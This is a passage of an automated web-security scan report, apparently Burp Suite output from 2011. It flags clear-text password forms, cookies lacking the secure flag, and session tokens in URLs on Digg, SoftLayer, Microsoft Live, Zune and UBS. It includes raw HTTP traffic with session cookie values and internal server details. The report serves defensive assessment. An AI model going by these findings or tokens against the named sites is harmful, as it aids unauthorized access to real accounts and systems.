Date: Wed, 06 Jul 2011 11:37:08 GMT
Server: Apache
X-Powered-By: PHP/5.2.9-digg8
X-Digg-Time: D=38879 10.2.129.225
Cache-Control: no-cache,no-store,must-revalidate
Pragma: no-cache
Vary: Accept-Encoding
Connection: close
Content-Type: text/html;charset=UTF-8
Content-Length: 10144

<!DOCTYPE html>
<html>
<head>
<meta charset="utf-8">
<title>Digg</title>

<meta name="keywords" content="Digg, pictures, breaking news, entertainment, politics, technology, headlin
...[SNIP]...
</script><form class="hidden">
<input type="text" name="ident" value="" id="ident-saved">
<input type="password" name="password" value="" id="password-saved">
</form>
...[SNIP]...

5.6. http://digg.com/search

Summary

Severity:   High
Confidence:   Certain
Host:   http://digg.com
Path:   /search

Issue detail

The page contains a form with the following action URL, which is submitted over clear-text HTTP:

The form contains the following password field:

Request

GET /search HTTP/1.1
Host: digg.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Wed, 06 Jul 2011 11:37:09 GMT
Server: Apache
X-Powered-By: PHP/5.2.9-digg8
X-Digg-Time: D=27180 10.2.129.226
Cache-Control: no-cache,no-store,must-revalidate
Pragma: no-cache
Vary: Accept-Encoding
Connection: close
Content-Type: text/html;charset=UTF-8
Content-Length: 8308

<!DOCTYPE html>
<html>
<head>
<meta charset="utf-8">
<title>Digg
- Search
</title>

<meta name="keywords" content="Digg, pictures, breaking news, entertainment, pol
...[SNIP]...
</script><form class="hidden">
<input type="text" name="ident" value="" id="ident-saved">
<input type="password" name="password" value="" id="password-saved">
</form>
...[SNIP]...

5.7. http://digg.com/submit

Summary

Severity:   High
Confidence:   Certain
Host:   http://digg.com
Path:   /submit

Issue detail

The page contains a form with the following action URL, which is submitted over clear-text HTTP:

The form contains the following password field:

Request

GET /submit?phase=2&url=https://www.microsoft.com/presspass/presskits/DCU/default.aspx HTTP/1.1
Host: digg.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Date: Wed, 06 Jul 2011 11:16:13 GMT
Server: Apache
X-Powered-By: PHP/5.2.9-digg8
X-Digg-Time: D=24761 10.2.128.235
Cache-Control: no-cache,no-store,must-revalidate
Pragma: no-cache
Vary: Accept-Encoding
Content-Type: text/html;charset=UTF-8
Content-Length: 8620

<!DOCTYPE html>
<html>
<head>
<meta charset="utf-8">
<title>Digg
- Submit a link
</title>

<meta name="keywords" content="Digg, pictures, breaking news, entertainment, politics
...[SNIP]...
</script><form class="hidden">
<input type="text" name="ident" value="" id="ident-saved">
<input type="password" name="password" value="" id="password-saved">
</form>
...[SNIP]...

5.8. http://digg.com/topic

Summary

Severity:   High
Confidence:   Certain
Host:   http://digg.com
Path:   /topic

Issue detail

The page contains a form with the following action URL, which is submitted over clear-text HTTP:

The form contains the following password field:

Request

GET /topic HTTP/1.1
Host: digg.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Wed, 06 Jul 2011 11:37:09 GMT
Server: Apache
X-Powered-By: PHP/5.2.9-digg8
X-Digg-Time: D=31422 10.2.129.226
Cache-Control: no-cache,no-store,must-revalidate
Pragma: no-cache
Vary: Accept-Encoding
Connection: close
Content-Type: text/html;charset=UTF-8
Content-Length: 12469

<!DOCTYPE html>
<html>
<head>
<meta charset="utf-8">
<title>Digg</title>

<meta name="keywords" content="Digg, pictures, breaking news, entertainment, politics, technology, headlin
...[SNIP]...
</script><form class="hidden">
<input type="text" name="ident" value="" id="ident-saved">
<input type="password" name="password" value="" id="password-saved">
</form>
...[SNIP]...

5.9. http://digg.com/upcoming

Summary

Severity:   High
Confidence:   Certain
Host:   http://digg.com
Path:   /upcoming

Issue detail

The page contains a form with the following action URL, which is submitted over clear-text HTTP:

The form contains the following password field:

Request

GET /upcoming HTTP/1.1
Host: digg.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Wed, 06 Jul 2011 11:37:07 GMT
Server: Apache
X-Powered-By: PHP/5.2.9-digg8
Cache-Control: no-cache,no-store,must-revalidate
Pragma: no-cache
Set-Cookie: imp_id=d49aeb50a0490b4b7e1f800682c23d942b50abde233eda6a7b26c684f1cf95d6; expires=Thu, 07-Jul-2011 11:37:07 GMT; path=/; domain=digg.com
X-Digg-Time: D=300792 10.2.129.80
Vary: Accept-Encoding
Connection: close
Content-Type: text/html;charset=UTF-8
Content-Length: 98962

<!DOCTYPE html>
<html>
<head>
<meta charset="utf-8">
<title>Digg
- All Topics
- Upcoming News Headlines, Videos and Images
</title>

<meta
...[SNIP]...
</script><form class="hidden">
<input type="text" name="ident" value="" id="ident-saved">
<input type="password" name="password" value="" id="password-saved">
</form>
...[SNIP]...

5.10. http://manage.softlayer.mobi/

Summary

Severity:   High
Confidence:   Certain
Host:   http://manage.softlayer.mobi
Path:   /

Issue detail

The page contains a form with the following action URL, which is submitted over clear-text HTTP:

The form contains the following password field:

Request

GET / HTTP/1.1
Host: manage.softlayer.mobi
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Wed, 06 Jul 2011 11:37:09 GMT
Server: Apache
Content-Length: 1832
Connection: close
Content-Type: text/html; charset=UTF-8
Vary: Accept-Encoding

<!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd"><html>
<head>
<title>SoftLayer - Mobile Portal Login</title>
<link rel="stylesheet" type="text/css
...[SNIP]...
<center>
<form id="index_form" name="data[index][index?cacheKey=]_form" action="http://manage.softlayer.mobi/index/index?cacheKey=" method="post"> <center>
...[SNIP]...
<BR>
<input type="password" id="user_password" name="data[User][password]" style="font-size:x-small" class="logintext" tabIndex="2" size="10" /><BR>
...[SNIP]...

6. SSL cookie without secure flag set
There are 12 instances of this issue:

Issue background

If the secure flag is set on a cookie, then browsers will not submit the cookie in any requests that use an unencrypted HTTP connection, thereby preventing the cookie from being trivially intercepted by an attacker monitoring network traffic. If the secure flag is not set, then the cookie will be transmitted in clear-text if the user visits any HTTP URLs within the cookie's scope. An attacker may be able to induce this event by feeding a user suitable links, either directly or via another web site. Even if the domain which issued the cookie does not host any content that is accessed over HTTP, an attacker may be able to use links of the form http://example.com:443/ to perform the same attack.

Issue remediation

The secure flag should be set on all cookies that are used for transmitting sensitive data when accessing content over HTTPS. If cookies are used to transmit session tokens, then areas of the application that are accessed over HTTPS should employ their own session handling mechanism, and the session tokens used should never be transmitted over unencrypted communications.


6.1. https://accountservices.passport.net/gethip.srf

Summary

Severity:   Medium
Confidence:   Firm
Host:   https://accountservices.passport.net
Path:   /gethip.srf

Issue detail

The following cookie was issued by the application and does not have the secure flag set:

The cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /gethip.srf?lc=1033&fid=2044200945&id=75046&fre=hard&type=visual HTTP/1.1
Host: accountservices.passport.net
Connection: keep-alive
Referer: https://accountservices.passport.net/uiresetpw.srf?mkt=EN-US&lc=1033&id=75046
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: CkTst=G1309951137024

Response

HTTP/1.1 200 OK
Cache-Control: no-cache
Pragma: no-cache
Content-Length: 19932
Content-Type: text/html; charset=utf-8
Expires: Wed, 06 Jul 2011 11:20:14 GMT
Server: Microsoft-IIS/7.5
P3P: CP="DSP CUR OTPi IND OTRi ONL FIN"
Set-Cookie: HIPSession=45S*6vuIWEDZGNM0*09htdJwOMobm7R5E2ZMW2RB2dSGkqC*apBp98w1vt43A3esAug*iHMBVLNvVAtuPikOTavfE!XPLQvoM*ecgi7xDXNJg$; domain=.passport.net;path=/;version=1
PPServer: PPV: 30 H: BAYIDSPROF1D05 V: 0
Date: Wed, 06 Jul 2011 11:21:13 GMT
Connection: close

var HIPM={name:"HIPM",innerFrame:null,comeinURLr:"",comeinURL:"",vv:"",eEmpty:"",eTooLong:"",eWrongAnswer:"",solutionElemt:"",afr:"audio",vfr:"visual",instruction:"",starttime:null,endtime:null,solnti
...[SNIP]...

6.2. https://ebanking.ubs.com/en/

Summary

Severity:   Information
Confidence:   Certain
Host:   https://ebanking.ubs.com
Path:   /en/

Issue detail

The following cookie was issued by the application and does not have the secure flag set:

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /en/ HTTP/1.1
Host: ebanking.ubs.com
Connection: keep-alive
Referer: http://www.ubs.com/1/e/online.html
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: www-stats=130ffb6627c.8526e520; NavLB_Www=www2.ubs.com; NavLB_PQ=quotes-public1.ubs.com; ubslang=en-US; WT_FPC=id=14.96.190.152-2611613264.30161891:lv=1309982088978:ss=1309981804815

Response

HTTP/1.1 302 Found
Date: Wed, 06 Jul 2011 13:59:55 GMT
Server: Apache
Pragma: no-cache
Set-Cookie: NavLB_EB=ebanking1.ubs.com; Domain=.ubs.com; Path=/; Version=1; HttpOnly
Connection: close
Location: https://ebanking1.ubs.com:443/en/?NavLB_EB=1309960795
Cache-Control: no-cache
P3P: CP="OTI DSP CURa OUR LEG COM NAV INT"
Content-Length: 286
Content-Type: text/html; charset=utf-8

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.0 Transitional//EN" "http://www.w3.org/TR/REC-html40/loose.dtd">
<HTML><HEAD>
<TITLE>302 Found</TITLE>
</HEAD><BODY>
<H1>Found</H1>
The document has moved <A
...[SNIP]...

6.3. https://live.zune.net/xweb/passport/bottomCB.aspx

Summary

Severity:   Information
Confidence:   Certain
Host:   https://live.zune.net
Path:   /xweb/passport/bottomCB.aspx

Issue detail

The following cookies were issued by the application and do not have the secure flag set: The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /xweb/passport/bottomCB.aspx HTTP/1.1
Host: live.zune.net
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Cache-Control: no-cache, no-store
Pragma: no-cache
Content-Type: text/html; charset=utf-8
Expires: -1
Server: Microsoft-IIS/7.0
eid: e16080d6-37d3-4938-9cb2-f9f14681964f,7554
lx-exp: zunenet_music_buyButtonUX,Force,C
X-AspNet-Version: 2.0.50727
Set-Cookie: EXPAllTREATMENTS=zunenet_music_buyButtonUX=C; domain=.zune.net; expires=Wed, 06-Jul-2011 14:39:03 GMT; path=/
Set-Cookie: EXPCONTEXTHASZUNEPASS=False; domain=.zune.net; path=/
Set-Cookie: lastCulture=en-US; domain=.zune.net; expires=Tue, 06-Jul-2021 14:09:03 GMT; path=/
lx-svr: S803
X-Powered-By: ASP.NET
Date: Wed, 06 Jul 2011 14:09:03 GMT
Connection: close
Content-Length: 4813

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"><html xmlns="http://www.w3.org/1999/xhtml" xmlns:fb="http://www.facebook.com/20
...[SNIP]...

6.4. https://live.zune.net/xweb/passport/rightCB.aspx

Summary

Severity:   Information
Confidence:   Certain
Host:   https://live.zune.net
Path:   /xweb/passport/rightCB.aspx

Issue detail

The following cookies were issued by the application and do not have the secure flag set: The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /xweb/passport/rightCB.aspx HTTP/1.1
Host: live.zune.net
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Cache-Control: no-cache, no-store
Pragma: no-cache
Content-Type: text/html; charset=utf-8
Expires: -1
Server: Microsoft-IIS/7.0
eid: b2db948c-3538-4620-8179-ed9314b7b5a4,734190
lx-exp: zunenet_music_buyButtonUX,Force,C
X-AspNet-Version: 2.0.50727
Set-Cookie: BSID=YJGgishn1FDOIHzbSuUPMCAIAABGs7BB5jvMASqQqOHLGf5OFjo09weF0q3UOnx8; domain=.zune.net; path=/
Set-Cookie: EXPAllTREATMENTS=zunenet_music_buyButtonUX=C; domain=.zune.net; expires=Wed, 06-Jul-2011 14:39:01 GMT; path=/
Set-Cookie: EXPCONTEXTHASZUNEPASS=False; domain=.zune.net; path=/
Set-Cookie: z_dto_minfo=; expires=Sun, 03-Jul-2011 14:09:01 GMT; path=/
Set-Cookie: supportedTuner=Undefined; path=/
Set-Cookie: z_email=; expires=Sun, 03-Jul-2011 14:09:01 GMT; path=/
Set-Cookie: lastCulture=en-US; domain=.zune.net; expires=Tue, 06-Jul-2021 14:09:01 GMT; path=/
lx-svr: S804
X-Powered-By: ASP.NET
Date: Wed, 06 Jul 2011 14:09:01 GMT
Connection: close
Content-Length: 5984

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"><html xmlns="http://www.w3.org/1999/xhtml" xmlns:fb="http://www.facebook.com/20
...[SNIP]...

6.5. https://live.zune.net/xweb/passport/topCB.aspx

Summary

Severity:   Information
Confidence:   Certain
Host:   https://live.zune.net
Path:   /xweb/passport/topCB.aspx

Issue detail

The following cookies were issued by the application and do not have the secure flag set: The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /xweb/passport/topCB.aspx HTTP/1.1
Host: live.zune.net
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Cache-Control: no-cache, no-store
Pragma: no-cache
Content-Type: text/html; charset=utf-8
Expires: -1
Server: Microsoft-IIS/7.0
eid: e16080d6-37d3-4938-9cb2-f9f14681964f,7548
lx-exp: zunenet_music_buyButtonUX,Force,C
X-AspNet-Version: 2.0.50727
Set-Cookie: EXPAllTREATMENTS=zunenet_music_buyButtonUX=C; domain=.zune.net; expires=Wed, 06-Jul-2011 14:38:58 GMT; path=/
Set-Cookie: EXPCONTEXTHASZUNEPASS=False; domain=.zune.net; path=/
Set-Cookie: lastCulture=en-US; domain=.zune.net; expires=Tue, 06-Jul-2021 14:08:58 GMT; path=/
lx-svr: S803
X-Powered-By: ASP.NET
Date: Wed, 06 Jul 2011 14:08:57 GMT
Connection: close
Content-Length: 4616

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"><html xmlns="http://www.w3.org/1999/xhtml" xmlns:fb="http://www.facebook.com/20
...[SNIP]...

6.6. https://login.live.com/login.srf

Summary

Severity:   Information
Confidence:   Certain
Host:   https://login.live.com
Path:   /login.srf

Issue detail

The following cookies were issued by the application and do not have the secure flag set: The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /login.srf?wa=wsignin1.0&rpsnv=11&ct=1309950910&rver=6.1.6206.0&wp=MBI&wreply=http:%2F%2Fprofile.live.com%2FBadge%2F&lc=1033&id=73625&popupui=1 HTTP/1.1
Host: login.live.com
Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: wlidperf=throughput=2&latency=1884; Sample=17; MWTMsgr=1; MUID=E361C23374E642C998D8ABA7166A75EC; E=P:P/yZGuUJzog=:Kzhdi7iyZGIIP6617hxekA9uY0QbUMz6hwgjPGAdv04=:F; xid=4eaac30d-fa12-4b9e-a769-aec310f3e37a&&BL2xxxxxC664&230; xidseq=1

Response

HTTP/1.1 200 OK
Cache-Control: no-cache
Pragma: no-cache
Content-Length: 14263
Content-Type: text/html; charset=utf-8
Expires: Wed, 06 Jul 2011 11:15:18 GMT
Server: Microsoft-IIS/7.5
P3P: CP="DSP CUR OTPi IND OTRi ONL FIN"
X-XSS-Protection: 0
Set-Cookie: MSPRequ=lt=1309950978&id=73625&co=1; path=/;version=1
Set-Cookie: MSPOK=$uuid-d5697c9c-79ed-4594-abc1-63001d12b87b$uuid-55d45d8a-4113-45e0-90d0-585f12970906; domain=login.live.com;path=/;version=1
X-Frame-Options: deny
PPServer: PPV: 30 H: BAYIDSLGN1E59 V: 0
Date: Wed, 06 Jul 2011 11:16:17 GMT
Connection: close

<!-- ServerInfo: BAYIDSLGN1E59 2011.06.02.00.31.45 Live1 Unknown LocVer:0 -->
<!-- PreprocessInfo: BTSA007:RR1BLDA130, -- Version: 11,0,18178,0 -->
<!-- RequestLCID: 1033, Market:EN-US, PrefCountry
...[SNIP]...

6.7. https://login.live.com/pp1100/

Summary

Severity:   Information
Confidence:   Certain
Host:   https://login.live.com
Path:   /pp1100/

Issue detail

The following cookies were issued by the application and do not have the secure flag set: The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /pp1100/ HTTP/1.1
Host: login.live.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Cache-Control: no-cache
Pragma: no-cache
Content-Length: 12506
Content-Type: text/html; charset=utf-8
Expires: Wed, 06 Jul 2011 11:20:03 GMT
Server: Microsoft-IIS/7.5
P3P: CP="DSP CUR OTPi IND OTRi ONL FIN"
X-XSS-Protection: 0
Set-Cookie: MSPRequ=lt=1309951263&co=1&id=N; path=/;version=1
Set-Cookie: MSPOK=$uuid-d5697c9c-79ed-4594-abc1-63001d12b87b$uuid-7de451db-9b09-4e35-8f6c-e4631fb77a69$uuid-d6a3848e-3000-4e73-b9aa-1fbbf88c0b72$uuid-bda392d9-cea9-45eb-8ed8-8becf6686968$uuid-1f6b6ccc-243c-4585-b8d9-61483ab07d76$uuid-173062aa-9edd-4769-b216-ebf691c92719; path=/;version=1
X-Frame-Options: deny
PPServer: PPV: 30 H: BAYIDSLGN1E41 V: 0
Date: Wed, 06 Jul 2011 11:21:02 GMT
Connection: close

<!-- ServerInfo: BAYIDSLGN1E41 2011.06.02.00.31.45 Live1 Unknown LocVer:0 -->
<!-- PreprocessInfo: BTSA007:RR1BLDA130, -- Version: 11,0,18178,0 -->
<!-- RequestLCID: 1033, Market:EN-US, PrefCountry
...[SNIP]...

6.8. https://login.live.com/ppsecure/post.srf

Summary

Severity:   Information
Confidence:   Certain
Host:   https://login.live.com
Path:   /ppsecure/post.srf

Issue detail

The following cookie was issued by the application and does not have the secure flag set: The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /ppsecure/post.srf HTTP/1.1
Host: login.live.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Cache-Control: no-cache
Pragma: no-cache
Content-Length: 12542
Content-Type: text/html; charset=utf-8
Expires: Wed, 06 Jul 2011 11:20:03 GMT
Server: Microsoft-IIS/7.5
P3P: CP="DSP CUR OTPi IND OTRi ONL FIN"
X-XSS-Protection: 0
Set-Cookie: MSPOK=$uuid-d5697c9c-79ed-4594-abc1-63001d12b87b$uuid-7de451db-9b09-4e35-8f6c-e4631fb77a69$uuid-d6a3848e-3000-4e73-b9aa-1fbbf88c0b72$uuid-bda392d9-cea9-45eb-8ed8-8becf6686968$uuid-1f6b6ccc-243c-4585-b8d9-61483ab07d76$uuid-f4d8415d-863c-470b-9c48-033be61fa412; path=/;version=1
X-Frame-Options: deny
PPServer: PPV: 30 H: BAYIDSLGN1E54 V: 0
Date: Wed, 06 Jul 2011 11:21:02 GMT
Connection: close

<!-- ServerInfo: BAYIDSLGN1E54 2011.06.02.00.31.45 Live1 Unknown LocVer:0 -->
<!-- PreprocessInfo: BTSA007:RR1BLDA130, -- Version: 11,0,18178,0 -->
<!-- RequestLCID: 1033, Market:EN-US, PrefCountry
...[SNIP]...

6.9. https://login.live.com/ppsecure/secure.srf

Summary

Severity:   Information
Confidence:   Certain
Host:   https://login.live.com
Path:   /ppsecure/secure.srf

Issue detail

The following cookies were issued by the application and do not have the secure flag set: The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /ppsecure/secure.srf HTTP/1.1
Host: login.live.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Cache-Control: no-cache
Pragma: no-cache
Content-Length: 12531
Content-Type: text/html; charset=utf-8
Expires: Wed, 06 Jul 2011 11:20:03 GMT
Server: Microsoft-IIS/7.5
P3P: CP="DSP CUR OTPi IND OTRi ONL FIN"
X-XSS-Protection: 0
Set-Cookie: MSPRequ=lt=1309951263&co=1&id=N; path=/;version=1
Set-Cookie: MSPOK=$uuid-d5697c9c-79ed-4594-abc1-63001d12b87b$uuid-7de451db-9b09-4e35-8f6c-e4631fb77a69$uuid-d6a3848e-3000-4e73-b9aa-1fbbf88c0b72$uuid-bda392d9-cea9-45eb-8ed8-8becf6686968$uuid-1f6b6ccc-243c-4585-b8d9-61483ab07d76$uuid-2f030afb-c784-4e3b-9dbe-a3f70a5aa8ef; path=/;version=1
X-Frame-Options: deny
PPServer: PPV: 30 H: BAYIDSLGN1E32 V: 0
Date: Wed, 06 Jul 2011 11:21:03 GMT
Connection: close

<!-- ServerInfo: BAYIDSLGN1E32 2011.06.02.00.31.45 Live1 Unknown LocVer:0 -->
<!-- PreprocessInfo: BTSA007:RR1BLDA130, -- Version: 11,0,18178,0 -->
<!-- RequestLCID: 1033, Market:EN-US, PrefCountry
...[SNIP]...

6.10. https://login.live.com/resetpw.srf

Summary

Severity:   Information
Confidence:   Certain
Host:   https://login.live.com
Path:   /resetpw.srf

Issue detail

The following cookies were issued by the application and do not have the secure flag set: The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /resetpw.srf?wa=wsignin1.0&rpsnv=11&ct=1309951117&rver=5.5.4177.0&wp=LBI&wreply=https:%2F%2Flive.zune.net%2Fxweb%2Flive%2Fpassport%2FsetCookies.ashx%3Frru%3DhttpZ3AZ2FZ2FsocialZ2EzuneZ2EnetZ2FMOVIESZ2F0Z2F34FA18ECZ2DECDAZ2D4609Z2DBE85Z2DCE80D58C3842Z3FtargetZ3Dweb&cb=B001033httpZ3AZ2FZ2FsocialZ2EzuneZ2EnetZ2FMOVIESZ2F0Z2F34FA18ECZ2DECDAZ2D4609Z2DBE85Z2DCE80D58C3842Z3FtargetZ3Dweb&id=75046&id=75046&vv=1100&mkt=EN-US&lc=1033&bk=1309951135 HTTP/1.1
Host: login.live.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Cache-Control: no-cache
Pragma: no-cache
Content-Length: 2145
Content-Type: text/html; charset=utf-8
Expires: Wed, 06 Jul 2011 14:07:45 GMT
Server: Microsoft-IIS/7.5
P3P: CP="DSP CUR OTPi IND OTRi ONL FIN"
X-XSS-Protection: 0
Set-Cookie: MSPOK=$uuid-d5697c9c-79ed-4594-abc1-63001d12b87b$uuid-7de451db-9b09-4e35-8f6c-e4631fb77a69$uuid-d6a3848e-3000-4e73-b9aa-1fbbf88c0b72$uuid-bda392d9-cea9-45eb-8ed8-8becf6686968$uuid-1f6b6ccc-243c-4585-b8d9-61483ab07d76$uuid-3ccd6cb3-2eff-4d36-a83a-da7d7f8300dc; path=/;version=1
Set-Cookie: MSPBack=1309951135; domain=login.live.com;path=/;version=1
PPServer: PPV: 30 H: BAYIDSLGN1O48 V: 0
Date: Wed, 06 Jul 2011 14:08:45 GMT
Connection: close

<html><head><noscript>JavaScript required to sign in<meta http-equiv="Refresh" content="0; URL=https://login.live.com/jsDisabled.srf?mkt=EN-US&lc=1033"/></noscript><title>Continue</title><script type=
...[SNIP]...

6.11. https://msnia.login.live.com/ppsecure/post.srf

Summary

Severity:   Information
Confidence:   Certain
Host:   https://msnia.login.live.com
Path:   /ppsecure/post.srf

Issue detail

The following cookie was issued by the application and does not have the secure flag set: The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /ppsecure/post.srf HTTP/1.1
Host: msnia.login.live.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Cache-Control: no-cache
Pragma: no-cache
Content-Length: 12632
Content-Type: text/html; charset=utf-8
Expires: Wed, 06 Jul 2011 11:20:33 GMT
Server: Microsoft-IIS/7.5
P3P: CP="DSP CUR OTPi IND OTRi ONL FIN"
X-XSS-Protection: 0
Set-Cookie: MSPOK=$uuid-d5697c9c-79ed-4594-abc1-63001d12b87b$uuid-7de451db-9b09-4e35-8f6c-e4631fb77a69$uuid-d6a3848e-3000-4e73-b9aa-1fbbf88c0b72$uuid-bda392d9-cea9-45eb-8ed8-8becf6686968$uuid-1f6b6ccc-243c-4585-b8d9-61483ab07d76$uuid-3040ca2c-de70-4a63-9d3d-1c68eed3a3d2; domain=login.live.com;path=/;version=1
X-Frame-Options: deny
PPServer: PPV: 30 H: TK2IDSMLGN1A10 V: 0
Date: Wed, 06 Jul 2011 11:21:32 GMT
Connection: close

<!-- ServerInfo: TK2IDSMLGN1A10 2011.06.02.00.31.45 Live1 Unknown LocVer:0 -->
<!-- PreprocessInfo: BTSA007:RR1BLDA130, -- Version: 11,0,18178,0 -->
<!-- RequestLCID: 1033, Market:EN-US, PrefCountr
...[SNIP]...

6.12. https://quotes-public.ubs.com/

Summary

Severity:   Information
Confidence:   Certain
Host:   https://quotes-public.ubs.com
Path:   /

Issue detail

The following cookie was issued by the application and does not have the secure flag set: The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET / HTTP/1.1
Host: quotes-public.ubs.com
Connection: keep-alive
Referer: https://www2.ubs.com/1/ssl/e/contact/contact.html?NavLB_Www=1309960260
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: www-stats=130ffb6627c.8526e520; NavLB_Www=www2.ubs.com; WT_FPC=id=14.96.190.152-2611613264.30161891:lv=1309981931097:ss=1309981804815

Response

HTTP/1.1 302 Found
Date: Wed, 06 Jul 2011 13:53:56 GMT
Server: Apache
Pragma: no-cache
Set-Cookie: NavLB_PQ=quotes-public1.ubs.com; Domain=.ubs.com; Path=/; Version=1
Connection: close
Location: https://quotes-public1.ubs.com:443/?NavLB_PQ=1309960436
Cache-Control: no-cache
P3P: CP="OTI DSP CURa OUR LEG COM NAV INT"
Content-Length: 288
Content-Type: text/html; charset=utf-8

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.0 Transitional//EN" "http://www.w3.org/TR/REC-html40/loose.dtd">
<HTML><HEAD>
<TITLE>302 Found</TITLE>
</HEAD><BODY>
<H1>Found</H1>
The document has moved <A
...[SNIP]...

7. Session token in URL
There are 3 instances of this issue:

Issue background

Sensitive information within URLs may be logged in various locations, including the user's browser, the web server, and any forward or reverse proxy servers between the two endpoints. URLs may also be displayed on-screen, bookmarked or emailed around by users. They may be disclosed to third parties via the Referer header when any off-site links are followed. Placing session tokens into the URL increases the risk that they will be captured by an attacker.

Issue remediation

The application should use an alternative mechanism for transmitting session tokens, such as HTTP cookies or hidden fields in forms that are submitted using the POST method.


7.1. https://manage.softlayer.com/

Summary

Severity:   Medium
Confidence:   Firm
Host:   https://manage.softlayer.com
Path:   /

Issue detail

The response contains the following links that appear to contain session tokens:

Request

GET / HTTP/1.1
Host: manage.softlayer.com
Accept: */*
Accept-Language: en
